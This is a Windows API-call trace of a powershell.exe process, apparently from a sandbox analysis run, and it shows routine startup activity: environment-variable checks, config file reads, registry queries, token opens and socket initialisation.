	[0626.754] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.754] CoTaskMemFree (pv=0x291a30) 
	[0626.767] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0626.767] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.767] CoTaskMemFree (pv=0x291a30) 
	[0626.769] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0626.769] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.769] CoTaskMemFree (pv=0x291a30) 
	[0626.771] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0626.771] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.771] CoTaskMemFree (pv=0x291a30) 
	[0626.776] VirtualQuery (in: lpAddress=0x1c7dd9b0, lpBuffer=0x1c7de870, dwLength=0x30 | out: lpBuffer=0x1c7de870*(BaseAddress=0x1c7dd000, AllocationBase=0x1be50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0626.777] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0626.777] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.777] CoTaskMemFree (pv=0x291a30) 
	[0626.780] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0626.780] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.780] CoTaskMemFree (pv=0x291a30) 
	[0626.780] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0626.781] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.781] CoTaskMemFree (pv=0x291a30) 
	[0626.782] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0626.782] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.782] CoTaskMemFree (pv=0x291a30) 
	[0626.786] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0626.787] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0626.787] CoTaskMemFree (pv=0x291a30) 
	[0627.587] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0627.587] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0627.587] CoTaskMemFree (pv=0x291a30) 
	[0627.590] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0627.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0627.590] CoTaskMemFree (pv=0x291a30) 
	[0627.591] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0627.591] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0627.591] CoTaskMemFree (pv=0x291a30) 
	[0627.594] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0627.594] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0627.594] CoTaskMemFree (pv=0x291a30) 
	[0627.595] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0627.595] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0627.595] CoTaskMemFree (pv=0x291a30) 
	[0627.597] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0627.597] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0627.597] CoTaskMemFree (pv=0x291a30) 
	[0627.598] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0627.598] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0627.598] CoTaskMemFree (pv=0x291a30) 
	[0628.385] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0628.385] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0628.385] CoTaskMemFree (pv=0x291a30) 
	[0630.223] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0630.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0630.223] CoTaskMemFree (pv=0x291a30) 
	[0630.227] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0630.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0630.227] CoTaskMemFree (pv=0x291a30) 
	[0630.231] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0630.231] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0630.231] CoTaskMemFree (pv=0x291a30) 
	[0630.235] CoTaskMemAlloc (cb=0x104) returned 0x291a30
	[0630.235] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x291a30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0630.235] CoTaskMemFree (pv=0x291a30) 
	[0686.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c7dd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0686.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c7dd280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0686.480] CoTaskMemAlloc (cb=0x20c) returned 0x1b952180
	[0686.480] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b952180, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0686.480] CoTaskMemFree (pv=0x1b952180) 
	[0686.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c7dd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0688.365] GetCurrentProcess () returned 0xffffffffffffffff
	[0688.365] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd348 | out: TokenHandle=0x1c7dd348*=0x360) returned 1
	[0688.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c7dcfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0688.371] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c7dd3f0 | out: lpFileInformation=0x1c7dd3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0688.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c7dcf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0688.373] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c7dd3a0 | out: lpFileInformation=0x1c7dd3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0688.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c7dcd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0688.374] SetErrorMode (uMode=0x1) returned 0x1
	[0688.375] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x374
	[0688.375] GetFileType (hFile=0x374) returned 0x1
	[0688.375] SetErrorMode (uMode=0x1) returned 0x1
	[0688.375] GetFileType (hFile=0x374) returned 0x1
	[0688.377] GetFileSize (in: hFile=0x374, lpFileSizeHigh=0x1c7dd398 | out: lpFileSizeHigh=0x1c7dd398*=0x0) returned 0x622a
	[0688.377] ReadFile (in: hFile=0x374, lpBuffer=0x30876e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7dd2b8, lpOverlapped=0x0 | out: lpBuffer=0x30876e8*, lpNumberOfBytesRead=0x1c7dd2b8*=0x1000, lpOverlapped=0x0) returned 1
	[0688.388] ReadFile (in: hFile=0x374, lpBuffer=0x30876e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7dcde8, lpOverlapped=0x0 | out: lpBuffer=0x30876e8*, lpNumberOfBytesRead=0x1c7dcde8*=0x1000, lpOverlapped=0x0) returned 1
	[0688.389] ReadFile (in: hFile=0x374, lpBuffer=0x30876e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7dcde8, lpOverlapped=0x0 | out: lpBuffer=0x30876e8*, lpNumberOfBytesRead=0x1c7dcde8*=0x1000, lpOverlapped=0x0) returned 1
	[0688.389] ReadFile (in: hFile=0x374, lpBuffer=0x30876e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7dcde8, lpOverlapped=0x0 | out: lpBuffer=0x30876e8*, lpNumberOfBytesRead=0x1c7dcde8*=0x1000, lpOverlapped=0x0) returned 1
	[0688.389] ReadFile (in: hFile=0x374, lpBuffer=0x30876e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7dcde8, lpOverlapped=0x0 | out: lpBuffer=0x30876e8*, lpNumberOfBytesRead=0x1c7dcde8*=0x1000, lpOverlapped=0x0) returned 1
	[0688.398] ReadFile (in: hFile=0x374, lpBuffer=0x30876e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7dcf28, lpOverlapped=0x0 | out: lpBuffer=0x30876e8*, lpNumberOfBytesRead=0x1c7dcf28*=0x1000, lpOverlapped=0x0) returned 1
	[0688.398] ReadFile (in: hFile=0x374, lpBuffer=0x30876e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7dcda8, lpOverlapped=0x0 | out: lpBuffer=0x30876e8*, lpNumberOfBytesRead=0x1c7dcda8*=0x22a, lpOverlapped=0x0) returned 1
	[0688.399] ReadFile (in: hFile=0x374, lpBuffer=0x30876e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7dce48, lpOverlapped=0x0 | out: lpBuffer=0x30876e8*, lpNumberOfBytesRead=0x1c7dce48*=0x0, lpOverlapped=0x0) returned 1
	[0688.399] CloseHandle (hObject=0x374) returned 1
	[0689.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c7dd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0689.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c7dd270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0689.792] CoTaskMemAlloc (cb=0x20c) returned 0x1b952180
	[0689.792] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b952180, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0689.794] CoTaskMemFree (pv=0x1b952180) 
	[0689.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c7dd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0689.798] GetCurrentProcess () returned 0xffffffffffffffff
	[0689.798] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd5a8 | out: TokenHandle=0x1c7dd5a8*=0x374) returned 1
	[0689.799] GetCurrentProcess () returned 0xffffffffffffffff
	[0689.799] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd5a8 | out: TokenHandle=0x1c7dd5a8*=0x34c) returned 1
	[0689.801] GetCurrentProcess () returned 0xffffffffffffffff
	[0689.801] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd348 | out: TokenHandle=0x1c7dd348*=0x378) returned 1
	[0689.802] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c7dd3f0 | out: lpFileInformation=0x1c7dd3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0689.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c7dcf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0689.804] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c7dd3a0 | out: lpFileInformation=0x1c7dd3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0689.805] GetCurrentProcess () returned 0xffffffffffffffff
	[0689.805] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd5a8 | out: TokenHandle=0x1c7dd5a8*=0x37c) returned 1
	[0689.806] GetCurrentProcess () returned 0xffffffffffffffff
	[0689.806] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd5a8 | out: TokenHandle=0x1c7dd5a8*=0x380) returned 1
	[0689.833] GetCurrentProcess () returned 0xffffffffffffffff
	[0689.833] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd228 | out: TokenHandle=0x1c7dd228*=0x384) returned 1
	[0691.828] GetCurrentProcess () returned 0xffffffffffffffff
	[0691.828] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd228 | out: TokenHandle=0x1c7dd228*=0x388) returned 1
	[0693.579] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x38c
	[0693.579] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3ac
	[0693.594] GetCurrentProcess () returned 0xffffffffffffffff
	[0693.594] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd1f8 | out: TokenHandle=0x1c7dd1f8*=0x370) returned 1
	[0693.601] GetCurrentProcess () returned 0xffffffffffffffff
	[0693.601] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd1f8 | out: TokenHandle=0x1c7dd1f8*=0x394) returned 1
	[0702.381] GetCurrentProcess () returned 0xffffffffffffffff
	[0702.381] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd138 | out: TokenHandle=0x1c7dd138*=0x360) returned 1
	[0702.389] GetCurrentProcess () returned 0xffffffffffffffff
	[0702.389] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd138 | out: TokenHandle=0x1c7dd138*=0x388) returned 1
	[0702.393] GetCurrentProcess () returned 0xffffffffffffffff
	[0702.393] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd778 | out: TokenHandle=0x1c7dd778*=0x374) returned 1
	[0702.403] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c7db838 | out: phkResult=0x1c7db838*=0x34c) returned 0x0
	[0702.403] RegQueryValueExW (in: hKey=0x34c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c7db7bc, lpData=0x0, lpcbData=0x1c7db7b8*=0x0 | out: lpType=0x1c7db7bc*=0x1, lpData=0x0, lpcbData=0x1c7db7b8*=0xe) returned 0x0
	[0702.403] CoTaskMemAlloc (cb=0x12) returned 0x1b98fcf0
	[0702.403] RegQueryValueExW (in: hKey=0x34c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c7db78c, lpData=0x1b98fcf0, lpcbData=0x1c7db788*=0xe | out: lpType=0x1c7db78c*=0x1, lpData="Client", lpcbData=0x1c7db788*=0xe) returned 0x0
	[0702.404] CoTaskMemFree (pv=0x1b98fcf0) 
	[0702.404] RegCloseKey (hKey=0x34c) returned 0x0
	[0702.413] CoTaskMemAlloc (cb=0xcd0) returned 0x1b9abb40
	[0706.139] RasEnumConnectionsW (in: param_1=0x1b9abb40, param_2=0x1c7dd7cc, param_3=0x1c7dd7c8 | out: param_1=0x1b9abb40, param_2=0x1c7dd7cc, param_3=0x1c7dd7c8) returned 0x0
	[0706.147] CoTaskMemFree (pv=0x1b9abb40) 
	[0706.185] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c7dd5d8 | out: lpWSAData=0x1c7dd5d8) returned 0
	[0706.194] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3d8
	[0708.850] setsockopt (s=0x3d8, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0708.850] closesocket (s=0x3d8) returned 0
	[0708.851] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3d8
	[0708.853] setsockopt (s=0x3d8, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0708.853] closesocket (s=0x3d8) returned 0
	[0708.862] GetCurrentProcess () returned 0xffffffffffffffff
	[0708.863] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dce58 | out: TokenHandle=0x1c7dce58*=0x3d8) returned 1
	[0709.026] GetCurrentProcess () returned 0xffffffffffffffff
	[0709.026] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dce58 | out: TokenHandle=0x1c7dce58*=0x3dc) returned 1
	[0717.156] GetCurrentProcessId () returned 0xf54
	[0720.719] CoTaskMemAlloc (cb=0x204) returned 0x1b9b2ff0
	[0720.719] GetComputerNameW (in: lpBuffer=0x1b9b2ff0, nSize=0x30b6178 | out: lpBuffer="XDUWTFONO", nSize=0x30b6178) returned 1
	[0720.719] CoTaskMemFree (pv=0x1b9b2ff0) 
	[0720.721] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c7dd338 | out: phkResult=0x1c7dd338*=0x3e0) returned 0x0
	[0720.721] RegQueryValueExW (in: hKey=0x3e0, lpValueName="Library", lpReserved=0x0, lpType=0x1c7dd2bc, lpData=0x0, lpcbData=0x1c7dd2b8*=0x0 | out: lpType=0x1c7dd2bc*=0x1, lpData=0x0, lpcbData=0x1c7dd2b8*=0x1c) returned 0x0
	[0720.721] CoTaskMemAlloc (cb=0x20) returned 0x1b98e790
	[0720.721] RegQueryValueExW (in: hKey=0x3e0, lpValueName="Library", lpReserved=0x0, lpType=0x1c7dd28c, lpData=0x1b98e790, lpcbData=0x1c7dd288*=0x1c | out: lpType=0x1c7dd28c*=0x1, lpData="netfxperf.dll", lpcbData=0x1c7dd288*=0x1c) returned 0x0
	[0720.721] CoTaskMemFree (pv=0x1b98e790) 
	[0720.721] RegQueryValueExW (in: hKey=0x3e0, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c7dd2bc, lpData=0x0, lpcbData=0x1c7dd2b8*=0x0 | out: lpType=0x1c7dd2bc*=0x4, lpData=0x0, lpcbData=0x1c7dd2b8*=0x4) returned 0x0
	[0720.722] RegQueryValueExW (in: hKey=0x3e0, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c7dd2c0, lpData=0x1c7dd2bc, lpcbData=0x1c7dd2b8*=0x4 | out: lpType=0x1c7dd2c0*=0x4, lpData=0x1c7dd2bc*=0x1, lpcbData=0x1c7dd2b8*=0x4) returned 0x0
	[0720.722] RegQueryValueExW (in: hKey=0x3e0, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c7dd2bc, lpData=0x0, lpcbData=0x1c7dd2b8*=0x0 | out: lpType=0x1c7dd2bc*=0x4, lpData=0x0, lpcbData=0x1c7dd2b8*=0x4) returned 0x0
	[0720.722] RegQueryValueExW (in: hKey=0x3e0, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c7dd2c0, lpData=0x1c7dd2bc, lpcbData=0x1c7dd2b8*=0x4 | out: lpType=0x1c7dd2c0*=0x4, lpData=0x1c7dd2bc*=0x137a, lpcbData=0x1c7dd2b8*=0x4) returned 0x0
	[0720.722] RegCloseKey (hKey=0x3e0) returned 0x0
	[0722.428] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c7dd2f8 | out: phkResult=0x1c7dd2f8*=0x3e0) returned 0x0
	[0722.428] RegQueryValueExW (in: hKey=0x3e0, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c7dd27c, lpData=0x0, lpcbData=0x1c7dd278*=0x0 | out: lpType=0x1c7dd27c*=0x4, lpData=0x0, lpcbData=0x1c7dd278*=0x4) returned 0x0
	[0722.428] RegQueryValueExW (in: hKey=0x3e0, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c7dd280, lpData=0x1c7dd27c, lpcbData=0x1c7dd278*=0x4 | out: lpType=0x1c7dd280*=0x4, lpData=0x1c7dd27c*=0x3, lpcbData=0x1c7dd278*=0x4) returned 0x0
	[0722.428] RegQueryValueExW (in: hKey=0x3e0, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c7dd27c, lpData=0x0, lpcbData=0x1c7dd278*=0x0 | out: lpType=0x1c7dd27c*=0x4, lpData=0x0, lpcbData=0x1c7dd278*=0x4) returned 0x0
	[0722.428] RegQueryValueExW (in: hKey=0x3e0, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c7dd280, lpData=0x1c7dd27c, lpcbData=0x1c7dd278*=0x4 | out: lpType=0x1c7dd280*=0x4, lpData=0x1c7dd27c*=0x20000, lpcbData=0x1c7dd278*=0x4) returned 0x0
	[0722.428] RegQueryValueExW (in: hKey=0x3e0, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c7dd27c, lpData=0x0, lpcbData=0x1c7dd278*=0x0 | out: lpType=0x1c7dd27c*=0x3, lpData=0x0, lpcbData=0x1c7dd278*=0xaa) returned 0x0
	[0722.428] RegQueryValueExW (in: hKey=0x3e0, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c7dd27c, lpData=0x30b9468, lpcbData=0x1c7dd278*=0xaa | out: lpType=0x1c7dd27c*=0x3, lpData=0x30b9468*, lpcbData=0x1c7dd278*=0xaa) returned 0x0
	[0722.433] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0724.060] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c7dd230, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x3e8
	[0724.063] MapViewOfFile (hFileMappingObject=0x3e8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2790000
	[0724.064] VirtualQuery (in: lpAddress=0x2790000, lpBuffer=0x1c7dd228, dwLength=0x30 | out: lpBuffer=0x1c7dd228*(BaseAddress=0x2790000, AllocationBase=0x2790000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0724.064] LocalFree (hMem=0x1b9969d0) returned 0x0
	[0724.065] RegCloseKey (hKey=0x3e0) returned 0x0
	[0725.560] GetVersionExW (in: lpVersionInformation=0x1c7dc200*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c7dc200*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0725.561] GetVersionExW (in: lpVersionInformation=0x1c7dc1d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c7dc1d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0725.563] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30ba118, cbSid=0x1c7dd210 | out: pSid=0x30ba118*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c7dd210) returned 1
